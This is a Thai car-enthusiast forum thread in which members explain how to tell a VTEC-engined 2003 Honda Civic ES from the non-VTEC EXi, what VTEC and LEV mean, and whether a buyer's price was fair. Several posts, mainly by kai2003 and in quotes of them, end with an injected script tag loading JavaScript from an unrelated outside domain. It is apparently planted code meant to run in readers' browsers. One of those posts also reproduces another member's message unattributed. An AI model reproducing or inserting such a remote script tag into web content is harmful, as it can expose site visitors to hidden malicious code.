ตอบ
BananaBoat

ชื่อเล่น: โบ๊ท

เข้าร่วม: 14 มกรา 2012
ตอบ: 472

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 345

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 18 มกรา 2012 17:48 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ผมเห็น civic es บางคันตัวหนังสือข้างหลังก็มีคำว่า v-tech กับ Lev แต่บางคันก็มีแค่ civic แค่นั้น
รบกวนช่วยชี้ความกระจ่างให้หน่อยครับ แล้ว Lev ที่ว่านี่คือคำว่าอะไรครับ
ขอบพระคุณครับ
ได้รับคำขอบคุณจาก: bank  tang_jang  duck26  K_series  khem_hatyai  hotmail 
BananaBoat

พุธ, 18 มกรา 2012 17:56 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ผมเข้าใจถูกไหมครับ ว่าถ้าไม่ใช่ วีเทครหัสเครื่องคือ D17Z1.... แต่ถ้าวีเทคคือ D17A2
แล้วราคาของแต่ละตัวอยู่ที่เท่าไรครับ ต่างกันมากไหมครับ
ได้รับคำขอบคุณจาก: bank  pairach_c  nato  khem_hatyai  hotmail 
Wut_On

ชื่อเล่น: วุฒิ

เข้าร่วม: 13 มกรา 2012
ตอบ: 776

Guru ES
Guru ES

ได้รับคำขอบคุณ: 646
ให้คำขอบคุณ: 540

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 18 มกรา 2012 18:33 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
รอผู้รู้ครับ
ได้รับคำขอบคุณจาก: BananaBoat  khem_hatyai  hotmail 
gittikhun

เข้าร่วม: 06 พฤศจิกา 2011
ตอบ: 275

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 582
ให้คำขอบคุณ: 290

ปี: 2004
พุธ, 18 มกรา 2012 18:44 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ถ้าเป็น ดรัมเบรค ก็เป็น ตัว exi ครับ แต่ถ้า คนที่เปลื่ยนจากดรัมเป็นดิสแล้วก็ต้องเปิดฝากระโปรงดูที่เครื่องอะครับ
ได้รับคำขอบคุณจาก: BananaBoat  K_series  khem_hatyai  hotmail 
gittikhun

พุธ, 18 มกรา 2012 18:45 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
BananaBoat พิมพ์ว่า:
ผมเข้าใจถูกไหมครับ ว่าถ้าไม่ใช่ วีเทครหัสเครื่องคือ D17Z1.... แต่ถ้าวีเทคคือ D17A2
แล้วราคาของแต่ละตัวอยู่ที่เท่าไรครับ ต่างกันมากไหมครับ

D17Z จะเป็น Exi ถูกแล้วครับ

ส่วน วีเทค จะเป็น D17A

ราคาขึ้นอยู่กับความพอใจของผู้ขายกับผู้ซื้ออะครับ แต่น่าจะต่างกัน 3-5 หมื่น มั้งครับ
ได้รับคำขอบคุณจาก: BananaBoat  zan  K_series  nato  khem_hatyai  hotmail 
BananaBoat

พุธ, 18 มกรา 2012 18:56 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
gittikhun พิมพ์ว่า:

D17Z จะเป็น Exi ถูกแล้วครับ

ส่วน วีเทค จะเป็น D17A

ราคาขึ้นอยู่กับความพอใจของผู้ขายกับผู้ซื้ออะครับ แต่น่าจะต่างกัน 3-5 หมื่น มั้งครับ

ด้วยความที่ผมไม่รู้ขอถามหน่อยนะครับ
-แล้วมันต่างกันยังไงละครับระหว่างเจ้า Exi กะเจ้าตัว วีเทคน่ะครับ
-ราคาสำหรับเจ้าตัวExi อยู่ที่ 353,000 บาทนี่แพงไปไหมครับ รถติดแสLPG มา แต่ไม่ทราบว่าติมมากี่กิโลแล้ว
ขอบคุณครับ
ได้รับคำขอบคุณจาก: khem_hatyai  hotmail 
MoDes

เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 3844

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 186

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 18 มกรา 2012 21:00 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
เปิดฝากระโปรงดูครับ ชัวสุด ตัววีเทคจะอยู่ข้างๆ ฝาครอบคอยล์ กะ กรองอากาศ ตัวป้อมๆอะครับ
ได้รับคำขอบคุณจาก: wangyu  BananaBoat  K_series  khem_hatyai  hotmail 
LifeFate

เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

พุธ, 18 มกรา 2012 21:05 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ลองค้นหาดูครับ มีเยอะมาก เวปนี้
ได้รับคำขอบคุณจาก: BananaBoat  K_series  khem_hatyai  hotmail 
tang_jang

ชื่อเล่น: ตี๋ง

เข้าร่วม: 14 ธันวา 2008
ตอบ: 270

ได้รับคำขอบคุณ: 745
ให้คำขอบคุณ: 679

สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 18 มกรา 2012 21:41 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
กระจ่างเลยครับ
ได้รับคำขอบคุณจาก: BananaBoat  khem_hatyai  hotmail 
civic3025

ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 18 มกรา 2012 21:47 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ราคามันแล้วตัวด้วยคับว่า topหรือไม่ top +สภาพรถด้วยคับ
BananaBoat

พุธ, 18 มกรา 2012 22:25 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
civic3025 พิมพ์ว่า:
ราคามันแล้วตัวด้วยคับว่า topหรือไม่ top +สภาพรถด้วยคับ

คือว่าผมไปจับเจ้าes 2003 มา 1คัน ด้วยความที่ว่าผมด้อยปัญญาก็เลยเข้าใจว่าตัวes รุ่นปี2003 น่าจะเป็นเครื่องวีเทคหมดแล้ว ก็เลยไม่ได้เอะใจ จนมาเริ่มรู้สึกได้ตอนที่เห็นว่ามำไมน๊าท้ายรถถึงไม่มีตัวหนังสือ vetch กับLev เหมือนของคนอื่นเขา และเบรคหลังก็เป็นดรัม ก็เลยคิดว่ามันต้องไม่ใช่เครื่องวีเทคแล้วละ แต่ผมก็ไม่ได้ซีเรียสเรื่องครื่องที่ใช่หรือไม่ใช่เพราะยังไงผมก็ชอบและได้มาแล้ว เพียงแค่อยากรู้ว่าราคาที่ผมซื้อมาสมเหตุสมผลหรือเปล่าครับ ตัวรถเป็นรุ่นมีabs ไม่มีแอร์แบคติดLPG เลขไมค์ 170,000 กว่าๆสภาพสีรถและรอยรอบคันก็90%
ได้รับคำขอบคุณจาก: K_series  khem_hatyai  hotmail 
win_RX

ชื่อเล่น: วิน

เข้าร่วม: 19 ธันวา 2010
ตอบ: 418

ได้รับคำขอบคุณ: 499
ให้คำขอบคุณ: 162

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 18 มกรา 2012 22:39 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
จัดมาแล้วก็ต้องดีคับ ส่วนหลังจากนี้เก็บเงินหาของแต่งโลด เผลอๆจัดหนักกว่า Vtec อีก K20A. ไปเลย
ได้รับคำขอบคุณจาก: duck26  BananaBoat  K_series  khem_hatyai  hotmail 
nilkung

ชื่อเล่น: นิล

เข้าร่วม: 21 กุมภา 2010
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1466
ให้คำขอบคุณ: 1317

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พุธ, 18 มกรา 2012 22:39 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
VTEC คืออะไร มีการทำงานอย่างไร ?

VTEC คือระบบการทำงานของเครื่องยนต์แบบหนึ่ง ระบบ VTEC มีชื่อเต็ม ๆ ว่า "Variable Vlave timing/Lift Electronic Control System" เป็นลิขสิทธิ์ของ HONDA CAR

ปัจจุบัน ระบบ VTEC มีอยู่ 3 แบบ คือ

1.DOHC VTEC ลักษณะการทำงานของมันจะมีเพลาราวลิ้นคู่ ใช้วาล์วไอดีและไอเสียอย่างละ 2 ตัวต่อหนึ่งสูบ ตัววาล์วจะทำงานโดยรับแรงกดมาจากชุดกระเดื่อง
กดวาล์ว ในจังหวะที่เครื่องยนต์ทำงานในรอบต่ำ การทำงานของวาล์วทั้ง 4 ตัวนี้จะทำงานตามลูกเบี้ยวของเพลาราวลิ้นตัวรอบต่ำ ให้จังหวะ "Timing" เปิด/ปิด วาล์ว
ในระดับปกติ แต่เมื่อใช้งานเครื่องยนต์ถึงความเร็วรอบสูงขึ้น ระบบก็จะเปลี่ยนมาใช้ลูกเบี้ยวตัวองศาสูงมาควบคุมการทำงานของวาล์วแทน เพื่อให้เหมาะสมกับการทำงาน
ของเครื่องยนต์ที่รอบสูง ช่วยให้เครื่องยนต์ทำงานได้ประสิทธิ์ภาพสูง ในช่วงความเร็วรอบสูงเพราะการทำงานของระบบ VTEC จะปรับตั้งทั้งองศา การทำงานของ
วาล์วและลิฟท์ (ระดับความสูงในการเปิดวาล์ว) ให้มากขึ้นด้วยซึ่งจะให้ผลดีทั้งในการบรรจุอากาศเข้าสู้ห้องเผาใหม้และคายไอเสียได้อย่างมีประสิทธิภาพ
ในส่วนการควบคุมการทำงานใการเปลี่ยนจังหวะการเปิดวาล์วจะกระทำโดยอาศัยการเคลื่อนที่ของลูกสูบไฮครอลิค เล็ก ๆ ติดต่อเชื่อม การทำงานของกระเดื่องวาล์วในแต่
ละชุด โดยระบบอิเล็กทรอนิกส์ (ECU-Electronic Control Unit) จะจับการเปลี่ยนแปลงของรอบความเร็วของเครื่องยนต์ และรับรู้สภาวะของเครื่องยนต์ เช่น ความเร็ว อุณหภูมิของน้ำหล่อเย็น ซึ่งข้อมูลต่าง ๆ เหล่านี้จะถูกไปที่ ECU เพื่อสั่งการทำงานจากฐานข้อมูลที่ได้รับอีกทีหนึ่ง

2.SOHC VTEC เป็นเครื่องยนต์แบบ 4 วาล์วต่อสูบเหมือนเดิมโดยแบ่งเป็นไอดี 2ไอเสีย 2 แต่ที่เพลาราวลิ้นแท่งเดียวกันนั้นจะมีลูกเบี้ยวอยู่ในตัว 2 ชุด ชุดหนึ่ง
สำหรับการทำงานของเครื่องยนต์ในช่วงรอบการทำงานต่ำ ๆ ส่วนอีกชุดหนึ่งเป็นองศาและลิฟท์สำหรับในช่วงรอบเครื่องยนต์สูง การทำงานจะใช้กระเดื่องกดวาล์วเป็นตัว
ควบคุมการทำงานของวาล์ว การเปลี่ยนการทำงานของลูกเบี้ยวหนึ่งไปอีกลูกเบี้ยวหนึ่ง จะขึ้นอยู่กับความเร็วแต่เมื่อความเร็วลดลง ชุดกระเดื่องก็จะถูกสั่งงานให้กลับมาใช้
ลูกเบี้ยวเดิมที่เคยใช้ในรอบต่ำเพื่อเน้นความประหยัด ส่วนการทำงานของลูกเบี้ยวไปมาเพื่อให้เหมาะสมกับความเร็วรอบนั้นก็เหมือนกับระบบ DOHC VTEC ที่ใช้ลูกสูบ
ไฮดรอลิกทำงาน โดยอาศัยแรงดันจากน้ำมันหล่อลื่นเครื่องยนต์ไปติดต่อการทำงานของกระเดื่อง ตามคำสั่งจากกล่อง ECU จากข้อมูลต่าง ๆ ที่กล่องได้รับ
3.VTEC-E เป็นเครื่องยนต์ 4 วาล์วต่อสูบใช้เพลาราวลิ้นเพียงตัวเดียวเป็นตัวควบคุมการทำงานของวาล์วทั้ง 4 ตัว ลักษณะของระบบแบบง่าย ๆ คือในช่วงรอบการ
ทำงานต่ำ ๆ จะเป็น วาล์วไอดีไว้ตัวหนึ่ง ซึ่งออกแบบให้ไอดีหมุนวนอย่างรุนแรง แต่เป็นระเบียบทำให้อัตราส่วนผสมน้ำมันเชื้อเพลิงที่ไหลเข้าสู่กระบอกสูบต่ำสามารถนำไป
เผาไหม้ได้อย่างมีประสิทธิภาพและหมดจดจน กระทั่งผู้ขับใช้รอบสูง โดยการเรียกอัตราเร่งของเครื่องยนต์ ลูกสูบไฮดรอลิกที่ชุดกระเดื่องวาล์วจะเคลื่อนที่ต่อการทำงาน
ของกระเดื่องวาล์วให้ควบคุมให้วาล์วไอดีเปิดทั้ง 2 ตัว โดยการควบคุมจะมาจากกล่อง ECU เป็นตัวสั่งงานอาศัยข้อมูลจากความเร็วรอบของเครื่องยนต์ภาระของเครื่อง
ยนต์ และแรงสุญญากาศภายในท่อร่วมไอดีมาควบคุมลูกสูบไฮดรอลิกที่กระเดื่องกดวาล์ว

LEV นี้ ย่อมาจาก " Low Emission Vehicle " ซึ่งเป็นเทคโนโลยีที่ทาง Honda คิดขึ้น เป็นระบบที่ช่วยให้การเผาไหม้ของเครื่องยนต์ดีขึ้น ลดมลภาวะลงคับ

Crd. racingweb.net
ได้รับคำขอบคุณจาก: duck26  BananaBoat  K_series  Wut_On  nooduean_69  khem_hatyai  hotmail  phoochit-n  kkcorp  HongTae 
MoDes

เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 3844

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 186

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 18 มกรา 2012 22:41 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
อ้างอิงจาก:
civic3025 พิมพ์ว่า:

คือว่าผมไปจับเจ้าes 2003 มา 1คัน ด้วยความที่ว่าผมด้อยปัญญาก็เลยเข้าใจว่าตัวes รุ่นปี2003 น่าจะเป็นเครื่องวีเทคหมดแล้ว ก็เลยไม่ได้เอะใจ จนมาเริ่มรู้สึกได้ตอนที่เห็นว่ามำไมน๊าท้ายรถถึงไม่มีตัวหนังสือ vetch กับLev เหมือนของคนอื่นเขา และเบรคหลังก็เป็นดรัม ก็เลยคิดว่ามันต้องไม่ใช่เครื่องวีเทคแล้วละ แต่ผมก็ไม่ได้ซีเรียสเรื่องครื่องที่ใช่หรือไม่ใช่เพราะยังไงผมก็ชอบและได้มาแล้ว เพียงแค่อยากรู้ว่าราคาที่ผมซื้อมาสมเหตุสมผลหรือเปล่าครับ ตัวรถเป็นรุ่นมีabs ไม่มีแอร์แบคติดLPG เลขไมค์ 170,000 กว่าๆสภาพสีรถและรอยรอบคันก็90%

ได้มาแล้วก็แนะนำว่าอย่าถามเลยครับ วิตกจริตป่าวๆ ห่ข้อมูลเรื่องบำรุงรักษา และแนวทางการแต่งดีกว่าว่าจะไปแนวไหน ส่วนตัวแล้วคิดว่าอะไรที่ได้มาแล้วก็ราคาถูกหมดแหละครับ
gittikhun

พุธ, 18 มกรา 2012 22:47 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
จะมีกันโคลงหน้า หลัง ที่เสริมเข้ามาด้วยนะครับสำหรับรุ่น v tech
ได้รับคำขอบคุณจาก: BananaBoat  K_series  hotmail  khem_hatyai 
nilkung

ครอบครัว ES
ครอบครัว ES

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พุธ, 18 มกรา 2012 22:47 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ส่วนเรื่องราคา ผมว่าไม่แพงนะคับ ตัว TOP ของเครื่อง 1.7 ปี 2003 ปัจจุบันราคาอยู่ที่ 430-450K ตัว Top ประมาณว่า มี ABS+Air bag คู่หน้า เบรคหน้าหลังเป็นจานดิส มีกันโคลงติดรถมาหน้าหลัง เครื่อง Vtec รหัส D17A2 ประมาณนั้น

นอกจากนี้ยังมีตัวเครื่องยนต์ 2.0 กับตัว RX (ตัว RX มีเฉพาะปี2001-02 กับ 2004-05) ที่ราคาจะสูงกว่ารุ่นปกติด้วย
ได้รับคำขอบคุณจาก: BananaBoat  K_series  hotmail  khem_hatyai 
es04

เข้าร่วม: 09 มีนา 2009
ตอบ: 803

Guru ES
Guru ES

ได้รับคำขอบคุณ: 3485
ให้คำขอบคุณ: 342

พุธ, 18 มกรา 2012 23:06 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ราคาที่ได้มาก็ประมาณนี้แหละครับ
แถมแก๊สมาอีกด้วย สุดคุ้มครับ
ได้รับคำขอบคุณจาก: K_series  BananaBoat  hotmail  khem_hatyai 
kai2003

ชื่อเล่น: ไก่ค้าบบบ

เข้าร่วม: 21 มกรา 2010
ตอบ: 686

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1243
ให้คำขอบคุณ: 229

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 18 มกรา 2012 23:09 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
nilkung พิมพ์ว่า:
VTEC คืออะไร มีการทำงานอย่างไร ?

VTEC คือระบบการทำงานของเครื่องยนต์แบบหนึ่ง ระบบ VTEC มีชื่อเต็ม ๆ ว่า "Variable Vlave timing/Lift Electronic Control System" เป็นลิขสิทธิ์ของ HONDA CAR

ปัจจุบัน ระบบ VTEC มีอยู่ 3 แบบ คือ

1.DOHC VTEC ลักษณะการทำงานของมันจะมีเพลาราวลิ้นคู่ ใช้วาล์วไอดีและไอเสียอย่างละ 2 ตัวต่อหนึ่งสูบ ตัววาล์วจะทำงานโดยรับแรงกดมาจากชุดกระเดื่อง
กดวาล์ว ในจังหวะที่เครื่องยนต์ทำงานในรอบต่ำ การทำงานของวาล์วทั้ง 4 ตัวนี้จะทำงานตามลูกเบี้ยวของเพลาราวลิ้นตัวรอบต่ำ ให้จังหวะ "Timing" เปิด/ปิด วาล์ว
ในระดับปกติ แต่เมื่อใช้งานเครื่องยนต์ถึงความเร็วรอบสูงขึ้น ระบบก็จะเปลี่ยนมาใช้ลูกเบี้ยวตัวองศาสูงมาควบคุมการทำงานของวาล์วแทน เพื่อให้เหมาะสมกับการทำงาน
ของเครื่องยนต์ที่รอบสูง ช่วยให้เครื่องยนต์ทำงานได้ประสิทธิ์ภาพสูง ในช่วงความเร็วรอบสูงเพราะการทำงานของระบบ VTEC จะปรับตั้งทั้งองศา การทำงานของ
วาล์วและลิฟท์ (ระดับความสูงในการเปิดวาล์ว) ให้มากขึ้นด้วยซึ่งจะให้ผลดีทั้งในการบรรจุอากาศเข้าสู้ห้องเผาใหม้และคายไอเสียได้อย่างมีประสิทธิภาพ
ในส่วนการควบคุมการทำงานใการเปลี่ยนจังหวะการเปิดวาล์วจะกระทำโดยอาศัยการเคลื่อนที่ของลูกสูบไฮครอลิค เล็ก ๆ ติดต่อเชื่อม การทำงานของกระเดื่องวาล์วในแต่
ละชุด โดยระบบอิเล็กทรอนิกส์ (ECU-Electronic Control Unit) จะจับการเปลี่ยนแปลงของรอบความเร็วของเครื่องยนต์ และรับรู้สภาวะของเครื่องยนต์ เช่น ความเร็ว อุณหภูมิของน้ำหล่อเย็น ซึ่งข้อมูลต่าง ๆ เหล่านี้จะถูกไปที่ ECU เพื่อสั่งการทำงานจากฐานข้อมูลที่ได้รับอีกทีหนึ่ง

2.SOHC VTEC เป็นเครื่องยนต์แบบ 4 วาล์วต่อสูบเหมือนเดิมโดยแบ่งเป็นไอดี 2ไอเสีย 2 แต่ที่เพลาราวลิ้นแท่งเดียวกันนั้นจะมีลูกเบี้ยวอยู่ในตัว 2 ชุด ชุดหนึ่ง
สำหรับการทำงานของเครื่องยนต์ในช่วงรอบการทำงานต่ำ ๆ ส่วนอีกชุดหนึ่งเป็นองศาและลิฟท์สำหรับในช่วงรอบเครื่องยนต์สูง การทำงานจะใช้กระเดื่องกดวาล์วเป็นตัว
ควบคุมการทำงานของวาล์ว การเปลี่ยนการทำงานของลูกเบี้ยวหนึ่งไปอีกลูกเบี้ยวหนึ่ง จะขึ้นอยู่กับความเร็วแต่เมื่อความเร็วลดลง ชุดกระเดื่องก็จะถูกสั่งงานให้กลับมาใช้
ลูกเบี้ยวเดิมที่เคยใช้ในรอบต่ำเพื่อเน้นความประหยัด ส่วนการทำงานของลูกเบี้ยวไปมาเพื่อให้เหมาะสมกับความเร็วรอบนั้นก็เหมือนกับระบบ DOHC VTEC ที่ใช้ลูกสูบ
ไฮดรอลิกทำงาน โดยอาศัยแรงดันจากน้ำมันหล่อลื่นเครื่องยนต์ไปติดต่อการทำงานของกระเดื่อง ตามคำสั่งจากกล่อง ECU จากข้อมูลต่าง ๆ ที่กล่องได้รับ
3.VTEC-E เป็นเครื่องยนต์ 4 วาล์วต่อสูบใช้เพลาราวลิ้นเพียงตัวเดียวเป็นตัวควบคุมการทำงานของวาล์วทั้ง 4 ตัว ลักษณะของระบบแบบง่าย ๆ คือในช่วงรอบการ
ทำงานต่ำ ๆ จะเป็น วาล์วไอดีไว้ตัวหนึ่ง ซึ่งออกแบบให้ไอดีหมุนวนอย่างรุนแรง แต่เป็นระเบียบทำให้อัตราส่วนผสมน้ำมันเชื้อเพลิงที่ไหลเข้าสู่กระบอกสูบต่ำสามารถนำไป
เผาไหม้ได้อย่างมีประสิทธิภาพและหมดจดจน กระทั่งผู้ขับใช้รอบสูง โดยการเรียกอัตราเร่งของเครื่องยนต์ ลูกสูบไฮดรอลิกที่ชุดกระเดื่องวาล์วจะเคลื่อนที่ต่อการทำงาน
ของกระเดื่องวาล์วให้ควบคุมให้วาล์วไอดีเปิดทั้ง 2 ตัว โดยการควบคุมจะมาจากกล่อง ECU เป็นตัวสั่งงานอาศัยข้อมูลจากความเร็วรอบของเครื่องยนต์ภาระของเครื่อง
ยนต์ และแรงสุญญากาศภายในท่อร่วมไอดีมาควบคุมลูกสูบไฮดรอลิกที่กระเดื่องกดวาล์ว

LEV นี้ ย่อมาจาก " Low Emission Vehicle " ซึ่งเป็นเทคโนโลยีที่ทาง Honda คิดขึ้น เป็นระบบที่ช่วยให้การเผาไหม้ของเครื่องยนต์ดีขึ้น ลดมลภาวะลงคับ

Crd. racingweb.net

แล้วESเราvtecอะไรอะครับ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: hotmail  khem_hatyai 
BananaBoat

พุธ, 18 มกรา 2012 23:09 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ขอบคุณมากครับสำหรับทุกๆคำตอบ ผมคงไม่คิดอะไรเกี่ยวกับตัวเครื่องนี่แล้วละครับ เพราะไม่ว่าจะยังไงผมก็คงรักและจะดูแลเจ้าes 03 รถคันแรกของผมคันนี้ให้ดี เพราะผมเริ่มคิดว่าต่อให้ผมได้รถดีมาเท่าไรแต่ถ้าไม่ดูแลก็ไม่มีประโยชน์อันใด พรมลิขิตคงบัลดาลให้ผมได้มาเจอและได้รถคันนี้มา
หน้าที่ต่อไปของผมก้มหน้าก้มตาเก็บเงินแต่งรถสวยๆตามรอยพี่พี่ที่ผมเห็นแค่รูปแต่ละคันแล้วเหอเหออยากได้มากกกกกก
ได้รับคำขอบคุณจาก: K_series  hotmail  khem_hatyai 
kai2003

Guru ES
Guru ES

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 18 มกรา 2012 23:10 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ซื้อมาแล้วก็ไม่ต้องคิดมากครับ เก็บเงินไว้เยอะๆครับ แล้วเปิด Civic ES Group บ่อยๆพอแล้วค้าบ
ได้รับคำขอบคุณจาก: K_series  BananaBoat  hotmail  khem_hatyai 
nilkung

ครอบครัว ES
ครอบครัว ES

พุธ, 18 มกรา 2012 23:15 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
kai2003 พิมพ์ว่า:

แล้วESเราvtecอะไรอะครับ "<script src="https://sport32news.com/civicesgroup.js">

ไม่แน่ใจคับ ข้อมูลบางที่ เป็น SOHC VTEC บางที่เป็น VTEC-E คับ

แต่ตัวผมให้น้ำหนักไปที่ SOHC น่ะคับ รอผู้รู้จริงท่านถัดไป
ได้รับคำขอบคุณจาก: K_series  hotmail  khem_hatyai 
kai2003

Guru ES
Guru ES

พุธ, 18 มกรา 2012 23:34 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
nilkung พิมพ์ว่า:

ไม่แน่ใจคับ ข้อมูลบางที่ เป็น SOHC VTEC บางที่เป็น VTEC-E คับ

แต่ตัวผมให้น้ำหนักไปที่ SOHC น่ะคับ รอผู้รู้จริงท่านถัดไป

ขอบคุณครับ
ได้รับคำขอบคุณจาก: hotmail  khem_hatyai 
kai2003

Guru ES
Guru ES

พุธ, 18 มกรา 2012 23:40 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ขอบคุณมากครับสำหรับทุกๆคำตอบ ผมคงไม่คิดอะไรเกี่ยวกับตัวเครื่องนี่แล้วละครับ เพราะไม่ว่าจะยังไงผมก็คงรักและจะดูแลเจ้าes 03 รถคันแรกของผมคันนี้ให้ดี เพราะผมเริ่มคิดว่าต่อให้ผมได้รถดีมาเท่าไรแต่ถ้าไม่ดูแลก็ไม่มีประโยชน์อันใด พรมลิขิตคงบัลดาลให้ผมได้มาเจอและได้รถคันนี้มา
หน้าที่ต่อไปของผมก้มหน้าก้มตาเก็บเงินแต่งรถสวยๆตามรอยพี่พี่ที่ผมเห็นแค่รูปแต่ละคันแล้วเหอเหออยากได้มากกกกกก

ตอนผมใด้คันนี้มาผมโทรไปหารุ่นพี่ที่ขายรถว่าอยากใด้accordงูเห่าครับ พี่บอกว่ามาดูcivicก่อน ผมก็ถามว่าเท่าไหร่เค้าบอกว่า 390000 ผมก็นึกว่าราคานี้ปี01(ตอนซื้อเกื่อบ3ปีแล้วครับ) พอไปดูบอกเลยครับว่าเข้าตามาก รถงามมากขนาดเดิมสนิทนะครับ ผมเล่นแต่รถมือ2ครับเปลี่ยนมาหลายคัน จะบอกว่าผมไม่เคยได้รถตามที่ผมต้องการเลยครับ สีก็ไม่เคยใด้เลื่อก รถมันเลื่อกเราครับ เราไม่ได้เลื่อกรถครับ "<script src="https://sport32news.com/civicesgroup.js">
TidTlE

ชื่อเล่น: ติ๊ด

เข้าร่วม: 17 ตุลา 2011
ตอบ: 518

ได้รับคำขอบคุณ: 444
ให้คำขอบคุณ: 593

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 19 มกรา 2012 00:25 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
ผมว่าการเลือกรถก็เหมือนการแต่งงานครับ ต้องพอใจทั้งสองฝ่ายครับ ที่เราตกลงซื้อแสดงว่าเรายอมรับเค้ามาเป็นคู่แล้วครับ
BananaBoat

พฤหัส, 19 มกรา 2012 05:50 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า

ตอนผมใด้คันนี้มาผมโทรไปหารุ่นพี่ที่ขายรถว่าอยากใด้accordงูเห่าครับ พี่บอกว่ามาดูcivicก่อน ผมก็ถามว่าเท่าไหร่เค้าบอกว่า 390000 ผมก็นึกว่าราคานี้ปี01(ตอนซื้อเกื่อบ3ปีแล้วครับ) พอไปดูบอกเลยครับว่าเข้าตามาก รถงามมากขนาดเดิมสนิทนะครับ ผมเล่นแต่รถมือ2ครับเปลี่ยนมาหลายคัน จะบอกว่าผมไม่เคยได้รถตามที่ผมต้องการเลยครับ สีก็ไม่เคยใด้เลื่อก รถมันเลื่อกเราครับ เราไม่ได้เลื่อกรถครับ "<script src="https://sport32news.com/civicesgroup.js">

TidTlE พิมพ์ว่า:
ผมว่าการเลือกรถก็เหมือนการแต่งงานครับ ต้องพอใจทั้งสองฝ่ายครับ ที่เราตกลงซื้อแสดงว่าเรายอมรับเค้ามาเป็นคู่แล้วครับ

ผมว่าก็จริงอย่างที่พี่พูดมานะครับ เพราะพอผมเห็นรถวันแรกผมก็รู้สึกได้เลยว่า ชอบอะ ยังไงยังไงต้องเอามาไว้ในครอบครองให้ได้ และผมก็ได้เจ้าลูกชายคันนี้มาสมใจ ยังไงก็ต้องเลี้ยงดูกันต่อไปครับ
Wut_On

ชื่อเล่น: วุฒิ

เข้าร่วม: 13 มกรา 2012
ตอบ: 776

Guru ES
Guru ES

ได้รับคำขอบคุณ: 646
ให้คำขอบคุณ: 540

ปี: 2002
พฤหัส, 19 มกรา 2012 08:19 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
จะ Exi หรือ Vtec มันก็ ES แต่งยังไงก็สวย
ได้รับคำขอบคุณจาก: BananaBoat  hotmail  khem_hatyai 
slek

เข้าร่วม: 14 ธันวา 2009
ตอบ: 789

Guru ES
Guru ES

ได้รับคำขอบคุณ: 918
ให้คำขอบคุณ: 1124
